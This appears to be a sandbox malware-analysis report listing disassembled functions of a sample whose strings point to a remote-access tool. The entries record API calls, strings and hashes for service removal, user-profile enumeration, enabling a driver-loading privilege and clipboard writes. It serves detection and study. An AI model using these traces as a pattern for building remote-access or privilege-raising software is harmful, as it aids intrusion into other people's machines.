                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$Current$MessageProcessThread$CountFileTickTime$DebugDispatchErrorLastModuleNameOutputResourcesStringSystemTimesTranslate
                                                                                          • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$ $%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$%d.$%ud %02uh %02um %02us$, error code %u (x%x)$, gdiHandles=%d$, runTime=$, thread=%s$, tid=%u (x%x)$.err$.exe$00h$00m$05/12/23 12:20:03 V14.10$Assert, tid=%x thread=%s exp=%s @ %hs:%d$File %hs, line %d%s%sBuild: %hs (%.17hs)Expression: %s$NOT copied to disk$Support\$copied to %s
                                                                                          • API String ID: 1606059176-3631277593
                                                                                          • Opcode ID: 1d0a455b27290b07e7e6bae2994e7f5ffe0958179c3965530c17daf70ac6bdfd
                                                                                          • Instruction ID: f9f6584ba23e67f1da3d3acbf868fe488a85bf64294c2ea4c255e4b05e138f07
                                                                                          • Opcode Fuzzy Hash: 1d0a455b27290b07e7e6bae2994e7f5ffe0958179c3965530c17daf70ac6bdfd
                                                                                          • Instruction Fuzzy Hash: E15219719002159BCF24DF64CD55BEB77BAFF84700F089595EA0AA72D0EB71AE84CB90
                                                                                          Function 005D80C0 Relevance: 89.7, APIs: 35, Strings: 16, Instructions: 497serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,DE64E134), ref: 005D80FA
                                                                                          • GetLastError.KERNEL32 ref: 005D810C
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F01FF), ref: 005D8134
                                                                                          • GetLastError.KERNEL32 ref: 005D8146
                                                                                          • OpenServiceW.ADVAPI32(?,PCISys,000F0003), ref: 005D85BE
                                                                                          • GetLastError.KERNEL32 ref: 005D85CA
                                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 005D868E
                                                                                          • OpenSCManagerW.ADVAPI32(?,?,000F003F), ref: 005D86F5
                                                                                          • GetLastError.KERNEL32 ref: 005D876A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOpen$Service$Manager$CloseHandleLoadStringwvsprintf
                                                                                          • String ID: /u /ex$Attempting to restart audio$Deleting %s$ImagePath$IsA()$PCISys$Remove Audio ret %d, e=%d$Remove nskbfltr ret %d$Removing nskblftr$SYSTEM\CurrentControlSet\Services\%s$\inv$\inv\$\inv\*.bin$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h$nskbfltr$restart audio ret %d
                                                                                          • API String ID: 3309688422-3552944703
                                                                                          • Opcode ID: 392ebc8df5e523ca6f908d961744b4cf3ce8469388033b0f7fda86890b5428f5
                                                                                          • Instruction ID: 56a4e250f38256cb4dd5c1965df4e8421fef6b558d069577e5f01ae4039248de
                                                                                          • Opcode Fuzzy Hash: 392ebc8df5e523ca6f908d961744b4cf3ce8469388033b0f7fda86890b5428f5
                                                                                          • Instruction Fuzzy Hash: E502F27090021A9BDB30EB68DC59BFA7B75FF94704F044197E809A3392EB705A85CF61
                                                                                          Function 005D1080 Relevance: 42.5, APIs: 7, Strings: 17, Instructions: 474libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32(0063C2E0), ref: 005D10B6
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES_300.DLL,00000000,00000002,NSMRES_300.DLL,NSMRES_300.DLL,NSMRES_300.DLL,NSMRES_300.DLL), ref: 005D11B4
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES_250.DLL,00000000,00000002,NSMRES_250.DLL,NSMRES_250.DLL,NSMRES_250.DLL), ref: 005D1296
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES_200.DLL,00000000,00000002,NSMRES_200.DLL,NSMRES_200.DLL,NSMRES_200.DLL), ref: 005D1378
                                                                                          • LoadLibraryExW.KERNEL32(NSSRESDM_150.DLL,00000000,00000002,NSSRESDM_150.DLL,NSSRESDM_150.DLL,NSSRESDM_150.DLL), ref: 005D1478
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES_125.DLL,00000000,00000002,NSMRES_125.DLL,NSMRES_125.DLL,NSMRES_125.DLL), ref: 005D1557
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES.DLL,00000000,00000002,NSMRES.DLL,NSMRES.DLL,NSMRES.DLL,NSMRES.DLL), ref: 005D1656
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$IncrementInterlocked
                                                                                          • String ID: ..\CTL32\util.cpp$NSMRES.DLL$NSMRESDM_150.DLL$NSMRES_125.DLL$NSMRES_150.DLL$NSMRES_200.DLL$NSMRES_250.DLL$NSMRES_300.DLL$NSSRES.DLL$NSSRESDM_150.DLL$NSSRES_125.DLL$NSSRES_150.DLL$NSSRES_200.DLL$NSSRES_250.DLL$NSSRES_300.DLL$dpi != -1$x
                                                                                          • API String ID: 4104599539-1743827446
                                                                                          • Opcode ID: 383ed7d88d9399ef20fa2eaa27a45c18e963b407586202d06b55432e26e2ae2e
                                                                                          • Instruction ID: 1261571db527f3a68d75910ef16a2c96d18f170a50b225aaf1429f0d3d831f16
                                                                                          • Opcode Fuzzy Hash: 383ed7d88d9399ef20fa2eaa27a45c18e963b407586202d06b55432e26e2ae2e
                                                                                          • Instruction Fuzzy Hash: 5E02D6B2D0050AABCB20DFECD859ADEBFB5FF49314F14812AE515AB390D7309A44CB95
                                                                                          Function 005C0C40 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 360fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 005C0D4E
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 005C0DF9
                                                                                          • FindClose.KERNEL32(00000000), ref: 005C0E08
                                                                                          • FindFirstFileW.KERNEL32(c:\users\*.*,?), ref: 005C0E38
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 005C0F04
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$File$First$CloseNext
                                                                                          • String ID: IsA()$c:\users\%s\AppData\Local\VirtualStore\%s$c:\users\%s\AppData\Roaming\%s$c:\users\*.*$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h$sysinfo.scp
                                                                                          • API String ID: 2001080981-3491454298
                                                                                          • Opcode ID: 8d655fd0953141a71355176e61b96dac3293b8368761e6d5dff4ffe6e5e2f4b0
                                                                                          • Instruction ID: aae9068167325d4cb9610c4942818049f1e1da54747c6de516a0b15226f8e128
                                                                                          • Opcode Fuzzy Hash: 8d655fd0953141a71355176e61b96dac3293b8368761e6d5dff4ffe6e5e2f4b0
                                                                                          • Instruction Fuzzy Hash: 66D190759002199FCB20DB94CC59FEAB77ABF94310F0486D9E909A3281DB716F95CF60
                                                                                          Function 005DCB70 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 363stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • lstrcmpiW.KERNEL32(?,00624BF8), ref: 005DCDEF
                                                                                            • Part of subcall function 005DB310: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 005DB389
                                                                                            • Part of subcall function 005DB310: GetLastError.KERNEL32 ref: 005DB39B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastManagerOpenlstrcmpi
                                                                                          • String ID: (null)$Application\PCIapp$C:\Windows\Installer\$Do Install (%d), params=<%s>$Done Install$PCIAX.DLL$Software\Microsoft\Windows\CurrentVersion\Uninstall\ProxyHost$System\PCIsys$gdihook4$iRemovedTS=%d$localmon$pcimon$Kb
                                                                                          • API String ID: 1860037224-3372856316
                                                                                          • Opcode ID: 7e0733d9ec3e711eebc707afece31b21f23ad35b4e4220fa75508097d1b64746
                                                                                          • Instruction ID: 1cdc0591f8d4c81e5c6765baff0036bcc67f97fe324321c2020173fb2baa5677
                                                                                          • Opcode Fuzzy Hash: 7e0733d9ec3e711eebc707afece31b21f23ad35b4e4220fa75508097d1b64746
                                                                                          • Instruction Fuzzy Hash: 4FC1FAB5D003179AEB30676C9D1A7A63E66FF50704F054077FD0997392EAB09D84C6E2
                                                                                          Function 005D4AF0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 129fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 005D4B11
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 005D4B6E
                                                                                          • FindClose.KERNEL32(00000000), ref: 005D4B80
                                                                                          • GetModuleFileNameW.KERNEL32(00590000,?,000000F6), ref: 005D4B95
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 005D4BDD
                                                                                          • FindClose.KERNEL32(00000000), ref: 005D4BE9
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005D4C71
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$CloseFirst$CopyDirectoryModuleNameSystem
                                                                                          • String ID: localmon$localmon.dll$pcimon$pcimon.dll
                                                                                          • API String ID: 958704277-202963052
                                                                                          • Opcode ID: dc4fb9e1879028eae9a35dfbc2474ca11c82603284971687b0453848a2cf30ce
                                                                                          • Instruction ID: ca792c8c4904c6a2ecdaa2560fd677d074702e9dfc45db60d847f84fee3f801f
                                                                                          • Opcode Fuzzy Hash: dc4fb9e1879028eae9a35dfbc2474ca11c82603284971687b0453848a2cf30ce
                                                                                          • Instruction Fuzzy Hash: 624146759112169BCB34DB68CC6ABBA7776BF80304F14829BE509672D1EB309E45CFA0
                                                                                          Function 005D22C0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 005D2303
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 005D230A
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 005D2321
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005D234D
                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 005D236D
                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 005D239A
                                                                                          • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,?), ref: 005D23DC
                                                                                          • CloseHandle.KERNEL32(?), ref: 005D241F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Token$InformationLookupPrivilegeProcess$AdjustCloseCurrentHandleNameOpenPrivilegesValue
                                                                                          • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s$SeLoadDriverPrivilege
                                                                                          • API String ID: 171400580-2784006985
                                                                                          • Opcode ID: 337191eb833c322897fc93674df039ddb9b9108ec7c7e38f055bb2ac4a146897
                                                                                          • Instruction ID: fc9e6a5bf562d1d415e101c9e7a2bd0f679f4a176f40a02edb985910fa72a67e
                                                                                          • Opcode Fuzzy Hash: 337191eb833c322897fc93674df039ddb9b9108ec7c7e38f055bb2ac4a146897
                                                                                          • Instruction Fuzzy Hash: B7416F71900229AFDB20CB65CC49FEABB79FF89700F04809AB90D92241DB745E85CFA1
                                                                                          Function 005D44C0 Relevance: 18.1, APIs: 12, Instructions: 114windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 005D44E1
                                                                                          • IsIconic.USER32(?), ref: 005D44EE
                                                                                          • GetClientRect.USER32(?,?), ref: 005D44FD
                                                                                          • GetSystemMetrics.USER32(00000000), ref: 005D4512
                                                                                          • GetSystemMetrics.USER32(00000001), ref: 005D4519
                                                                                          • IsIconic.USER32(?), ref: 005D4543
                                                                                          • GetWindowRect.USER32(?,?), ref: 005D4552
                                                                                          • GetSystemMetrics.USER32(00000000), ref: 005D4578
                                                                                          • GetSystemMetrics.USER32(00000010), ref: 005D4588
                                                                                          • GetSystemMetrics.USER32(00000001), ref: 005D4594
                                                                                          • GetSystemMetrics.USER32(00000011), ref: 005D45A4
                                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 005D45BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$RectWindow$Iconic$Client
                                                                                          • String ID:
                                                                                          • API String ID: 2775841378-0
                                                                                          • Opcode ID: 85f15c9e507bb4150044ca0b1acb9cc60c2808a4f467fe620fe6b0e3c9031bd3
                                                                                          • Instruction ID: f06b1139f7d44cdf73f63562f095d369105542ac7a84ec5f4a6a20af68caebc6
                                                                                          • Opcode Fuzzy Hash: 85f15c9e507bb4150044ca0b1acb9cc60c2808a4f467fe620fe6b0e3c9031bd3
                                                                                          • Instruction Fuzzy Hash: 26410B32E001199FCB10DFADDD89AEEBBF6BF88700F55415AE505B7254DB70AE018BA4
                                                                                          Function 005CA6C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95librarymemoryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005CA71E
                                                                                          • LoadLibraryW.KERNEL32(Advapi32.dll), ref: 005CA730
                                                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 005CA762
                                                                                          • FreeSid.ADVAPI32(?), ref: 005CA782
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005CA78D
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005CA7B4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary$AddressAllocateErrorInitializeLastLoadOpenProcVersion
                                                                                          • String ID: Advapi32.dll$CheckTokenMembership
                                                                                          • API String ID: 3620134906-3257277533
                                                                                          • Opcode ID: ec55e88f833a5ddd6b30c038562bb162fa8ab04f92b88c4742a067fed0a26204
                                                                                          • Instruction ID: 87ac94cfe57d7ff672f731d3a7b7a43771f13e96b54b764cce6dc7946011d21f
                                                                                          • Opcode Fuzzy Hash: ec55e88f833a5ddd6b30c038562bb162fa8ab04f92b88c4742a067fed0a26204
                                                                                          • Instruction Fuzzy Hash: 1D3127B1D40219AFCB10DFEAD8C9AEEFBB9FB48714F54442EE515A3240D73459008BA1
                                                                                          Function 005B8FB0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindResourceW.KERNEL32(?,?,00000002), ref: 005B8FC2
                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 005B8FCF
                                                                                          • LockResource.KERNEL32(00000000), ref: 005B8FD8
                                                                                          • GetDC.USER32(00000000), ref: 005B8FE2
                                                                                          • SelectPalette.GDI32(00000000,?,00000000), ref: 005B900E
                                                                                          • RealizePalette.GDI32(00000000), ref: 005B9015
                                                                                          • CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 005B902C
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B9037
                                                                                          • DeleteObject.GDI32(00000000), ref: 005B903E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Resource$Palette$BitmapCreateDeleteFindLoadLockObjectRealizeReleaseSelect
                                                                                          • String ID:
                                                                                          • API String ID: 3264011865-0
                                                                                          • Opcode ID: 6e13009f906f528fb77515cc457d063d345063bd900c30c2ce3b8fd6ea6dbb7e
                                                                                          • Instruction ID: c179623ed2b04b48acc3e653341d597129efea04e17e59667dd3a643b19f1d6b
                                                                                          • Opcode Fuzzy Hash: 6e13009f906f528fb77515cc457d063d345063bd900c30c2ce3b8fd6ea6dbb7e
                                                                                          • Instruction Fuzzy Hash: 47116A71600215BBD7106FB59C5DBFB7BBDEF8AB11F14801AFA05D6250DA749D0087B0
                                                                                          Function 005C6A30 Relevance: 13.6, APIs: 9, Instructions: 54clipboardmemorywindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(?), ref: 005C6A37
                                                                                          • GlobalAlloc.KERNEL32(00002002,?), ref: 005C6A69
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 005C6A72
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 005C6A84
                                                                                          • EmptyClipboard.USER32 ref: 005C6A8A
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 005C6A93
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 005C6A9E
                                                                                          • MessageBeep.USER32(00000030), ref: 005C6AA6
                                                                                          • CloseClipboard.USER32 ref: 005C6AAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 2291271916-0
                                                                                          • Opcode ID: ae715b82e88beca1ac90003709153864c37cdb154d277343569abbcc47448b08
                                                                                          • Instruction ID: cb734e313170be9327885c5b05193460c1133d92a1e6abe653919e64f03f598c
                                                                                          • Opcode Fuzzy Hash: ae715b82e88beca1ac90003709153864c37cdb154d277343569abbcc47448b08
                                                                                          • Instruction Fuzzy Hash: F2019236200204AFDB106FA5EC5DEDB3B6EEF8A745B089026FA09D7161D6709A01CBB1
                                                                                          Function 00602C9B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetUserDefaultLCID.KERNEL32(00000083,00000000,000000BC,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602D84
                                                                                          • IsValidCodePage.KERNEL32(00000000,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602DD6
                                                                                          • IsValidLocale.KERNEL32(?,00000001,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602DE9
                                                                                          • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602E53
                                                                                          • GetLocaleInfoA.KERNEL32(?,00001002,00000014,00000040,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602E67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
